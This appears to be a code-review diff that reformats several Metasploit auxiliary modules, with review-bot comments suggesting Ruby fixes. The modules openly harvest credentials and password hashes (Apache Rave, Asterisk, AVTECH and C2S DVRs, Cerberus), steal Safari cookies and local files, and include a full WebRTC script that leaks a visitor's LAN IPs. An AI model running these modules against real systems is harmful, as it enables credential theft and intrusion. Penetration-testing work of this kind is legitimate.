Some sample UXSS scripts are provided in data/exploits/uxss.
},
'Author' => [
'Rafay Baloch', # Original discovery, disclosure
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [
[ 'WebServer' ]
],
'PassiveActions' => [
'WebServer'
],
'References' => [
[ 'URL', 'http://1337day.com/exploit/description/22581' ],
[ 'OSVDB', '110664' ],
[ 'CVE', '2014-6041' ]
],
'DefaultAction' => 'WebServer'
)
)
register_options([
OptString.new('TARGET_URLS', [
@@ -79,7 +82,7 @@ class MetasploitModule < Msf::Auxiliary
collect_data(request)
send_response_html(cli, '')
else
payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
domains = datastore['TARGET_URLS'].split(',')
html = <<-EOS
+26 -28
@@ -8,30 +8,31 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Rave User Information Disclosure',
'Description' => %q{
This module exploits an information disclosure in Apache Rave 0.20 and prior. The
vulnerability exists in the RPC API, which allows any authenticated user to
disclose information about all the users, including their password hashes. In order
to authenticate, the user can provide his own credentials. Also the default users
installed with Apache Rave 0.20 will be tried automatically. This module has been
successfully tested on Apache Rave 0.20.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'Apache Rave User Information Disclosure',
'Description' => %q{
This module exploits an information disclosure in Apache Rave 0.20 and prior. The
vulnerability exists in the RPC API, which allows any authenticated user to
disclose information about all the users, including their password hashes. In order
to authenticate, the user can provide his own credentials. Also the default users
installed with Apache Rave 0.20 will be tried automatically. This module has been
successfully tested on Apache Rave 0.20.
},
'License' => MSF_LICENSE,
'Author' => [
'Andreas Guth', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-1814' ],
[ 'OSVDB', '91235' ],
[ 'BID', '58455' ],
[ 'EDB', '24744']
]
))
)
)
register_options(
[
@@ -39,7 +40,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),
OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),
OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),
])
]
)
end
def post_auth?
@@ -50,8 +52,8 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.to_s, "j_spring_security_check")
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'j_password' => username,
'j_username' => password
@@ -69,8 +71,8 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.to_s, "app", "api", "rpc", "users", "get")
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'uri' => uri,
'method' => 'GET',
'vars_get' => {
'offset' => "#{offset}"
},
@@ -82,7 +84,6 @@ class MetasploitModule < Msf::Auxiliary
else
return nil
end
end
def setup
@@ -130,20 +131,18 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
def run
print_status("#{rhost}:#{rport} - Fingerprinting...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "login"),
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, "login"),
'method' => 'GET',
})
if not res
print_error("#{rhost}:#{rport} - No response, aborting...")
return
elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
version =$1
version = $1
if version <= "0.20"
print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
else
@@ -229,6 +228,5 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
end
@@ -3,38 +3,40 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::FtpServer
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
'Description' => %q{
A vulnerability exists in versions of OSX, iOS, and Windows Safari released
before April 8, 2015 that allows the non-HTTPOnly cookies of any
domain to be stolen.
},
'License' => MSF_LICENSE,
'Author' => [
'Jouko Pynnonen', # Initial discovery and disclosure
'joev', # msf module
],
'References' => [
[ 'CVE', '2015-1126' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2015-04-08'
))
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
'Description' => %q{
A vulnerability exists in versions of OSX, iOS, and Windows Safari released
before April 8, 2015 that allows the non-HTTPOnly cookies of any
domain to be stolen.
},
'License' => MSF_LICENSE,
'Author' => [
'Jouko Pynnonen', # Initial discovery and disclosure
'joev', # msf module
],
'References' => [
[ 'CVE', '2015-1126' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2015-04-08'
)
)
register_options([
OptString.new('URIPATH', [false, 'The URI to use for this exploit (default is random)']),
OptPort.new('SRVPORT', [true, 'The local port to use for the FTP server', 5555 ]),
OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
OptPort.new('SRVPORT', [true, 'The local port to use for the FTP server', 5555 ]),
OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
OptString.new('TARGET_DOMAINS', [
true,
'The comma-separated list of domains to steal non-HTTPOnly cookies from.',
@@ -43,7 +45,6 @@ class MetasploitModule < Msf::Auxiliary
])
end
#
# Start the FTP and HTTP server
#
@@ -54,12 +55,11 @@ class MetasploitModule < Msf::Auxiliary
@http_service.wait
end
#
# Handle the HTTP request and return a response. Code borrowed from:
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
def start_http(opts = {})
# Ensture all dependencies are present before initializing HTTP
use_zlib
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
@@ -97,8 +97,8 @@ class MetasploitModule < Msf::Auxiliary
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
@@ -117,10 +117,10 @@ class MetasploitModule < Msf::Auxiliary
#
# Lookup the right address for the client
#
def lookup_lhost(c=nil)
def lookup_lhost(c = nil)
# Get the source address
if datastore['SRVHOST'] == '0.0.0.0'
Rex::Socket.source_address( c || '50.50.50.50')
Rex::Socket.source_address(c || '50.50.50.50')
else
datastore['SRVHOST']
end
@@ -162,7 +162,6 @@ class MetasploitModule < Msf::Auxiliary
end
end
#
# Ensures that gzip can be used. If not, an exception is generated. The
# exception is only raised if the DisableGzip advanced option has not been
@@ -174,19 +173,17 @@ class MetasploitModule < Msf::Auxiliary
end
end
#
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
return @uri_path if @uri_path
@uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
@uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
@uri_path = '/' + @uri_path if @uri_path !~ /^\//
@uri_path
end
#
# Handle HTTP requests and responses
#
@@ -228,7 +225,7 @@ class MetasploitModule < Msf::Auxiliary
#
# Create an HTTP response and then send it
#
def send_response(cli, code, message='OK', html='')
def send_response(cli, code, message = 'OK', html = '')
proto = Rex::Proto::Http::DefaultProtocol
res = Rex::Proto::Http::Response.new(code, message, proto)
res['Content-Type'] = 'text/html'
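Review bot: `resource_uri` in the `@@ -174` hunk tests for a leading slash with `@uri_path !~ /^\//`; `^` is a line anchor rather than a start-of-string anchor, and a plain prefix test is both exact and clearer: `@uri_path = '/' + @uri_path unless @uri_path.start_with?('/')`. The handler registration in the `@@ -97` hunk wraps the call in `Proc.new { |cli, req| on_request_uri(cli, req) }`; the idiomatic form is `proc { |cli, req| on_request_uri(cli, req) }`. The comment `# Ensture all dependencies are present before initializing HTTP` in `start_http` has a typo and should read `# Ensure all dependencies are present before initializing HTTP`.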
@@ -12,28 +12,31 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
'Description' => %q{
Generates a .webarchive file for Mac OS X Safari that will attempt to
inject cross-domain Javascript (UXSS), silently install a browser
extension, collect user information, steal the cookie database,
and steal arbitrary local files.
super(
update_info(
info,
'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
'Description' => %q{
Generates a .webarchive file for Mac OS X Safari that will attempt to
inject cross-domain Javascript (UXSS), silently install a browser
extension, collect user information, steal the cookie database,
and steal arbitrary local files.
When opened on the target machine the webarchive file must not have the
quarantine attribute set, as this forces the webarchive to execute in a
sandbox.
},
'License' => MSF_LICENSE,
'Author' => 'joev',
'References' =>
[
When opened on the target machine the webarchive file must not have the
quarantine attribute set, as this forces the webarchive to execute in a
sandbox.
},
'License' => MSF_LICENSE,
'Author' => 'joev',
'References' => [
['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
],
'DisclosureDate' => '2013-02-22',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'))
'DisclosureDate' => '2013-02-22',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
@@ -71,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary
# @return [String] filename where we are storing the data
def record_data(data, cli)
if data.is_a? Hash
file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')
end
store_loot(
file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
@@ -100,5 +103,4 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
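Review bot: In `record_data` (signature in the `@@ -71` hunk; the method continues past it), `file || "data"` never falls back when the key contains no ASCII letters, because `gsub(/[^A-Za-z]/, '')` then yields `""`, which is truthy in Ruby, so an empty string is passed to `store_loot` as the loot type. Normalise the value before the call, e.g. `file = nil if file && file.empty?`, or fold the fallback in with `file = "data" if file.nil? || file.empty?`. The `data.is_a? Hash` check could be `data.respond_to?(:keys)` in keeping with duck typing, though the explicit class check is harmless here.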
+37 -32
@@ -8,21 +8,24 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Asterisk Gather Credentials',
'Description' => %q{
This module retrieves SIP and IAX2 user extensions and credentials from
Asterisk Call Manager service. Valid manager credentials are required.
},
'Author' => 'bcoles',
'References' =>
[
super(
update_info(
info,
'Name' => 'Asterisk Gather Credentials',
'Description' => %q{
This module retrieves SIP and IAX2 user extensions and credentials from
Asterisk Call Manager service. Valid manager credentials are required.
},
'Author' => 'bcoles',
'References' => [
['URL', 'http://www.asterisk.name/sip1.html'],
['URL', 'http://www.asterisk.name/iax2.html'],
['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],
['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']
],
'License' => MSF_LICENSE))
'License' => MSF_LICENSE
)
)
register_options [
Opt::RPORT(5038),
OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),
@@ -59,17 +62,19 @@ class MetasploitModule < Msf::Auxiliary
print_status "Found #{@users.length} users"
cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',
'Indent' => 1,
cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Secret', 'Type']
@users.each do |user|
cred_table << [ user['username'],
user['password'],
user['type'] ]
report_cred user: user['username'],
cred_table << [
user['username'],
user['password'],
user['type']
]
report_cred user: user['username'],
password: user['password'],
proof: "#{user['type']} show users"
proof: "#{user['type']} show users"
end
print_line
@@ -100,25 +105,25 @@ class MetasploitModule < Msf::Auxiliary
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
address: rhost,
port: rport,
service_name: 'asterisk_manager',
protocol: 'tcp',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge service_data
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge service_data
create_credential_login login_data
@@ -152,14 +157,14 @@ class MetasploitModule < Msf::Auxiliary
return false unless res =~ /Response: Success/
report_cred user: username,
report_cred user: username,
password: password,
proof: 'Response: Success'
proof: 'Response: Success'
report_service :host => rhost,
:port => rport,
report_service :host => rhost,
:port => rport,
:proto => 'tcp',
:name => 'asterisk'
:name => 'asterisk'
true
end
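Review bot: `report_cred` in the `@@ -100` hunk hard-codes `status: Metasploit::Model::Login::Status::UNTRIED`, but its caller in the `@@ -152` hunk invokes it right after `return false unless res =~ /Response: Success/` confirmed a successful manager login, so that login is recorded as untried. Let the caller choose: `status: opts.fetch(:status, Metasploit::Model::Login::Status::UNTRIED),` in `login_data`, and `report_cred user: username, password: password, proof: 'Response: Success', status: Metasploit::Model::Login::Status::SUCCESSFUL` at the call site, while the SIP/IAX2 users extracted in the `@@ -59` hunk keep the default. The `Rex::Text::Table.new 'Header' => ...` call spread over three lines without parentheses in that same hunk is what forced the re-indentation; wrapping the argument hash in parentheses makes the layout stable. The method containing the `@@ -152` hunk begins outside it.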
@@ -8,21 +8,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'AVTECH 744 DVR Account Information Retrieval',
'Description' => %q{
This module will extract the account information from the AVTECH 744 DVR devices,
including usernames, cleartext passwords, and the device PIN, along with
a few other miscellaneous details. In order to extract the information, hardcoded
credentials admin/admin are used. These credentials can't be changed from the device
console UI nor from the web UI.
},
'Author' => [ 'nstarke' ],
'License' => MSF_LICENSE
))
super(
update_info(
info,
'Name' => 'AVTECH 744 DVR Account Information Retrieval',
'Description' => %q{
This module will extract the account information from the AVTECH 744 DVR devices,
including usernames, cleartext passwords, and the device PIN, along with
a few other miscellaneous details. In order to extract the information, hardcoded
credentials admin/admin are used. These credentials can't be changed from the device
console UI nor from the web UI.
},
'Author' => [ 'nstarke' ],
'License' => MSF_LICENSE
)
)
end
def run
res = send_request_cgi({
'method' => 'POST',
+20 -18
@@ -6,28 +6,30 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "HTTP Client Information Gather",
'Description' => %q{
This module gathers information about a browser that exploits might be interested in, such
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
but you can customize this output by changing the Custom404 datastore option, and
redirect to an external web page.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'DisclosureDate' => '2016-03-22',
'Actions' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "HTTP Client Information Gather",
'Description' => %q{
This module gathers information about a browser that exploits might be interested in, such
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
but you can customize this output by changing the Custom404 datastore option, and
redirect to an external web page.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'DisclosureDate' => '2016-03-22',
'Actions' => [
[
'WebServer',
'Description' => 'A web server that collects information about the browser.'
'Description' => 'A web server that collects information about the browser.'
]
],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
))
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def is_key_wanted?(key)
+84 -84
@@ -10,25 +10,25 @@ class MetasploitModule < Msf::Auxiliary
super(
update_info(
info,
'Name' => 'HTTP Client LAN IP Address Gather',
'Description' => %q(
'Name' => 'HTTP Client LAN IP Address Gather',
'Description' => %q{
This module retrieves a browser's network interface IP addresses
using WebRTC.
),
'License' => MSF_LICENSE,
'Author' => [
},
'License' => MSF_LICENSE,
'Author' => [
'Daniel Roesler', # JS Code
'Dhiraj Mishra' # MSF Module
],
'References' => [
[ 'CVE', '2018-6849' ],
[ 'URL', 'http://net.ipcalf.com/' ],
[ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
],
],
'References' => [
[ 'CVE', '2018-6849' ],
[ 'URL', 'http://net.ipcalf.com/' ],
[ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
],
'DisclosureDate' => '2013-09-05',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
'DefaultAction' => 'WebServer'
)
)
end
@@ -38,94 +38,94 @@ class MetasploitModule < Msf::Auxiliary
end
def setup
# code from: https://github.com/diafygi/webrtc-ips
@html = <<-JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
# code from: https://github.com/diafygi/webrtc-ips
@html = <<~JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\\n');
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
getIPs(function(ip){
//console.log(ip);
var xmlhttp = new XMLHttpRequest;
xmlhttp.open('POST', window.location, true);
xmlhttp.send(ip);
});
</script>
JS
getIPs(function(ip){
//console.log(ip);
var xmlhttp = new XMLHttpRequest;
xmlhttp.open('POST', window.location, true);
xmlhttp.send(ip);
});
</script>
JS
end
def on_request_uri(cli, request)
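Review bot: In the embedded `handleCandidate` function (the `<<~JS` heredoc in the `@@ -38` hunk), `ip_regex.exec(candidate)[1]` dereferences the match without checking it; `exec` returns `null` when a candidate carries no literal IP (current browsers commonly emit mDNS `.local` host candidates instead), and the resulting TypeError aborts the callback. Guard it: `var m = ip_regex.exec(candidate); if (!m) return; var ip_addr = m[1];`. Note also that switching `<<-JS` to `<<~JS` strips the common indentation from the served body; harmless for this script, but it changes the emitted bytes, not only the source layout.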
@@ -10,19 +10,18 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'C2S DVR Management Password Disclosure',
'Description' => %q{
'Name' => 'C2S DVR Management Password Disclosure',
'Description' => %q{
C2S DVR allows an unauthenticated user to disclose the username
& password by requesting the javascript page 'read.cgi?page=2'.
This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
},
'References' => [['EDB', '40265']],
'Author' =>
[
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'References' => [['EDB', '40265']],
'Author' => [
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Aug 19 2016'
)
@@ -36,8 +35,8 @@ class MetasploitModule < Msf::Auxiliary
url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
vprint_status("Attempting to load data from #{url}?page=2")
res = send_request_cgi({
'uri' => url,
'vars_get' => {'page'=>'2'}
'uri' => url,
'vars_get' => { 'page' => '2' }
})
unless res
print_error("#{peer} Unable to connect to #{url}")
@@ -52,8 +51,8 @@ class MetasploitModule < Msf::Auxiliary
if res.body =~ /pw_adminpw = "(.+?)";/
print_good("Found: admin:#{$1}")
store_valid_credential(
user: 'admin',
private: $1,
user: 'admin',
private: $1,
private_type: :password
)
end
@@ -61,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
if res.body =~ /pw_userpw = "(.+?)";/
print_good("Found: user:#{$1}")
store_valid_credential(
user: 'user',
private: $1,
user: 'user',
private: $1,
private_type: :password
)
end
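Review bot: `'DisclosureDate' => 'Aug 19 2016'` in the `@@ -10` hunk (and `'Mar 7 2016'` in the Cerberus Helpdesk section below) uses a free-form date, whereas the other modules on this page use ISO `YYYY-MM-DD` values such as `'2015-04-08'` and `'2019-01-24'`; `'DisclosureDate' => '2016-08-19'` keeps the metadata consistent and machine-parseable. The `$1` references in the `@@ -52` and `@@ -61` hunks (`print_good("Found: admin:#{$1}")`, `private: $1`) would read better as a local match, e.g. `if (m = res.body.match(/pw_adminpw = "(.+?)";/))` followed by `m[1]`, or as `Regexp.last_match(1)`. The enclosing method starts outside these hunks.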
@@ -10,29 +10,28 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'Cerberus Helpdesk User Hash Disclosure',
'Description' => %q{
'Name' => 'Cerberus Helpdesk User Hash Disclosure',
'Description' => %q{
This module extracts usernames and password hashes from the Cerberus Helpdesk
through an unauthenticated access to a workers file.
Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
},
'References' =>
[
[ 'EDB', '39526' ]
],
'Author' =>
[
'asdizzle_', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'References' => [
[ 'EDB', '39526' ]
],
'Author' => [
'asdizzle_', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Mar 7 2016'
)
register_options(
[
OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
])
]
)
end
def run_host(rhost)
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
['devblocks', 'zend'].each do |site|
url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
vprint_status("Attempting to load data from #{url}")
res = send_request_cgi({'uri' => url})
res = send_request_cgi({ 'uri' => url })
if !res
print_error("#{peer} Unable to connect to #{url}")
next
@@ -51,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
next
end
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
'Indent' => 1,
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password Hash']
# the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
@@ -66,8 +65,8 @@ class MetasploitModule < Msf::Auxiliary
password_hash = cred[7].tr('";', '') # remove extra characters
print_good("Found: #{username}:#{password_hash}")
store_valid_credential(
user: username,
private: password_hash,
user: username,
private: password_hash,
private_type: :nonreplayable_hash
)
cred_table << [username, password_hash]
@@ -77,7 +76,6 @@ class MetasploitModule < Msf::Auxiliary
print_line cred_table.to_s
break
end
rescue ::Rex::ConnectionError
print_error("#{peer} Unable to connect to site")
return
+25 -21
@@ -8,33 +8,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
firewalls to obtain the firewall name and management station
(such as SmartCenter) name via a pre-authentication request. The string
returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
host. Whilst considered "public" information, the majority of installations
use detailed hostnames which may aid an attacker in focusing on compromising
the SmartCenter host, or useful for government, intelligence and military
networks where the hostname reveals the physical location and rack number
of the device, which may be unintentionally published to the world.
},
'Author' => [ 'aushack' ],
'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
'References' =>
[
super(
update_info(
info,
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
firewalls to obtain the firewall name and management station
(such as SmartCenter) name via a pre-authentication request. The string
returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
host. Whilst considered "public" information, the majority of installations
use detailed hostnames which may aid an attacker in focusing on compromising
the SmartCenter host, or useful for government, intelligence and military
networks where the hostname reveals the physical location and rack number
of the device, which may be unintentionally published to the world.
},
'Author' => [ 'aushack' ],
'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
'References' => [
# aushack - None? Stumbled across, probably an old bug/feature but unsure.
[ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
[ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
]
))
)
)
register_options(
[
Opt::RPORT(264),
])
]
)
end
def autofilter
@@ -65,15 +68,16 @@ class MetasploitModule < Msf::Auxiliary
print_error("Unexpected response: '#{res.inspect}'")
end
report_info(fw_hostname,sc_hostname)
report_info(fw_hostname, sc_hostname)
disconnect
end
# Only trust that it's real if we have a hostname. If you get a funny
# response, it might not be what we think it is.
def report_info(fw_hostname,sc_hostname)
def report_info(fw_hostname, sc_hostname)
return unless fw_hostname
host_info = {
:host => datastore['RHOST'],
:os_name => "Checkpoint Firewall-1",
+18 -15
@@ -10,20 +10,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
'Description' => %q{
This module uses the Chrome Debugger's API to read
files off the remote file system, or to make web requests
from a remote machine. Useful for cloud metadata endpoints!
},
'Author' => [
'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
'Nicholas Starke (The King Pig Demon)' # msf module
],
'DisclosureDate' => '2019-09-24',
'License' => MSF_LICENSE
))
super(
update_info(
info,
'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
'Description' => %q{
This module uses the Chrome Debugger's API to read
files off the remote file system, or to make web requests
from a remote machine. Useful for cloud metadata endpoints!
},
'Author' => [
'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
'Nicholas Starke (The King Pig Demon)' # msf module
],
'DisclosureDate' => '2019-09-24',
